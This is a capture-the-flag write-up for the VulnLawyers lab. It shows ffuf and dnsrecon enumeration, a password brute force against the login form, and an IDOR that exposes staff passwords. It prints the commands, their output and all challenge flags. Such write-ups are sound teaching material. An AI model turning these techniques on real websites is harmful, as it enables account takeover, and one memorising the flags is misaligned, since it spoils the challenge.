Vulnlawyers
DNS Recon
❯ nslookup -type=any vulnlawyers.co.uk 8.8.8.8
Server: 8.8.8.8
Address: 8.8.8.8#53
Non-authoritative answer:
Name: vulnlawyers.co.uk
Address: 68.183.255.206
vulnlawyers.co.uk nameserver = ns1.digitalocean.com.
vulnlawyers.co.uk nameserver = ns2.digitalocean.com.
vulnlawyers.co.uk nameserver = ns3.digitalocean.com.
vulnlawyers.co.uk
origin = ns1.digitalocean.com
mail addr = hostmaster.vulnlawyers.co.uk
serial = 1626211986
refresh = 10800
retry = 3600
expire = 604800
minimum = 1800
Authoritative answers can be found from:
❯ dnsrecon -d vulnlawyers.co.uk -D ~/Dokumente/ctfchallenge/wordlists/subdomains.txt -t brt
[*] Performing host and subdomain brute force against vulnlawyers.co.uk
[*] A data.vulnlawyers.co.uk 68.183.255.206
[*] A www.vulnlawyers.co.uk 68.183.255.206
[+] 2 Records Found
Content Discovery
❯ ./ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.2 -H "Cookie: ctfchallenge=CENSORED" -u http://www.vulnlawyers.co.uk/FUZZ -mc all -fc 404
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.4.1-dev
________________________________________________
:: Method : GET
:: URL : http://www.vulnlawyers.co.uk/FUZZ
:: Wordlist : FUZZ: /home/zerospl0it/Dokumente/ctfchallenge/wordlists/content.txt
:: Header : Cookie: ctfchallenge=CENSORED
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 1
:: Delay : 0.20 seconds
:: Matcher : Response status: all
:: Filter : Response status: 404
________________________________________________
css [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 29ms]
denied [Status: 401, Size: 1020, Words: 178, Lines: 30, Duration: 30ms]
images [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 31ms]
js [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 29ms]
login [Status: 302, Size: 1119, Words: 197, Lines: 31, Duration: 38ms]❯ curl -H "Cookie: ctfchallenge=CENSORED" http://vulnlawyers.co.uk/login<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>VulnLawyers - Old Login</title>
<link href="/css/bootstrap.min.css" rel="stylesheet">
<link href="/template-manager/style.css" rel="stylesheet">
</head>
<body>
<div class="container">
<div class="row">
<div class="col-md-12">
<h1 style="padding-top:100px;text-align: center;color: #060505;letter-spacing: -1px;font-weight: bold">VulnLawyers</h1>
<h3 class="text-center">We'll win that case!</h3>
</div>
</div>
<div class="row">
<div class="col-md-6 col-md-offset-3">
<div class="alert alert-info">
<p>Access to this portal can now be found here <a href=/lawyers-only">/lawyers-only</a></p>
<p>[^FLAG^FB52470E40F47559EBA87252B2D4CF67^FLAG^]</p>
</div>
</div>
</div>
</div>
<script src="/js/jquery.min.js"></script>
<script src="/js/bootstrap.min.js"></script>
</body>
</html>API Discovery
❯ ./ffuf -w ~/Dokumente/ctfchallenge/wordlists/content.txt -t 1 -p 0.2 -H "Cookie: ctfchallenge=CENSORED" -u http://data.vulnlawyers.co.uk/FUZZ -mc all -fc 404
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.4.1-dev
________________________________________________
:: Method : GET
:: URL : http://data.vulnlawyers.co.uk/FUZZ
:: Wordlist : FUZZ: /home/zerospl0it/Dokumente/ctfchallenge/wordlists/content.txt
:: Header : Cookie: ctfchallenge=CENSORED
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 1
:: Delay : 0.20 seconds
:: Matcher : Response status: all
:: Filter : Response status: 404
________________________________________________
campaigns [Status: 429, Size: 169, Words: 7, Lines: 8, Duration: 27ms]
users [Status: 200, Size: 406, Words: 6, Lines: 1, Duration: 29ms]
web.config [Status: 429, Size: 169, Words: 7, Lines: 8, Duration: 26ms]
❯ curl -H "Cookie: ctfchallenge=CENSORED" http://data.vulnlawyers.co.uk/users | jq
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 406 0 406 0 0 6766 0 --:--:-- --:--:-- --:--:-- 6766
{
"users": [
{
"name": "Yusef Mcclain",
"email": "yusef.mcclain@vulnlawyers.co.uk"
},
{
"name": "Shayne Cairns",
"email": "shayne.cairns@vulnlawyers.co.uk"
},
{
"name": "Eisa Evans",
"email": "eisa.evans@vulnlawyers.co.uk"
},
{
"name": "Jaskaran Lowe",
"email": "jaskaran.lowe@vulnlawyers.co.uk"
},
{
"name": "Marsha Blankenship",
"email": "marsha.blankenship@vulnlawyers.co.uk"
}
],
"flag": "[^FLAG^25032EB0D322F7330182507FBAA1A55F^FLAG^]"
}Bruteforcing
We've discovered the login page previously during our content discovery phase. Let's check if we can crack a password by using the infos we've gathered on the api
Let's check the login panel source
<div class="panel-body">
<form method="post">
<div><label>User Email:</label></div>
<div style="margin-top: 7px"><input class="form-control" name="email" ></div>
<div style="margin-top: 7px"><label>Password:</label></div>
<div><input class="form-control" type="password" name="password" ></div>
<div style="margin-top:7px">
<input type="submit" class="btn btn-success pull-right" value="Login"></div>using ffuf we will bruteforce the password
❯ ./ffuf -w ~/Dokumente/ctfchallenge/wordlists/passwords.txt -X POST -d "email=jaskaran.lowe@vulnlawyers.co.uk&password=FUZZ" -t 1 -p 0.1 -H "Cookie: ctfchallenge=CENSORED" -H "Content-Type: application/x-www-form-urlencoded" -u http://www.vulnlawyers.co.uk/lawyers-only-login -mc all -fc 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.4.1-dev
________________________________________________
:: Method : POST
:: URL : http://www.vulnlawyers.co.uk/lawyers-only-login
:: Wordlist : FUZZ: /home/zerospl0it/Dokumente/ctfchallenge/wordlists/passwords.txt
:: Header : Cookie: ctfchallenge=CENSORED
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : email=jaskaran.lowe@vulnlawyers.co.uk&password=FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 1
:: Delay : 0.10 seconds
:: Matcher : Response status: all
:: Filter : Response status: 200
________________________________________________
123456 [Status: 401, Size: 1925, Words: 554, Lines: 48, Duration: 33ms]
password [Status: 401, Size: 1925, Words: 554, Lines: 48, Duration: 32ms]
summer [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 30ms]
:: Progress: [101/101] :: Job [1/1] :: 7 req/sec :: Duration: [0:00:13] :: Errors: 0 ::After we logged in as jaskaran.lowe@vulnlawyers.co.uk using the password summer we can find another flag [^FLAG^7F1ED1F306FC4E3399CEE15DF4B0AE3C^FLAG^]
IDOR
{"id":4,"name":"Jaskaran Lowe","email":"jaskaran.lowe@vulnlawyers.co.uk","password":"summer"}{"id":1,"name":"Yusef Mcclain","email":"yusef.mcclain@vulnlawyers.co.uk","password":"Rk@c7#U3@2r%0f"}{"id":2,"name":"Shayne Cairns","email":"shayne.cairns@vulnlawyers.co.uk","password":"q2V944a1^3p","flag":"[^FLAG^938F5DC109A1E9B4FF3E3E92D29A56B3^FLAG^]"}{"id":3,"name":"Eisa Evans","email":"eisa.evans@vulnlawyers.co.uk","password":"Sn06#ibx@lGPG7"}{"id":5,"name":"Marsha Blankenship","email":"marsha.blankenship@vulnlawyers.co.uk","password":"A^66vqhOU!e2ZV"}Final Flag
Logging in as Shayn Cairns we seem to have permissions to delete cases. Let's examine this. After clicking on "delete case" we get the final flag [^FLAG^B38BAE0B8B804FCB85C730F10B3B5CB5^FLAG^]
Last updated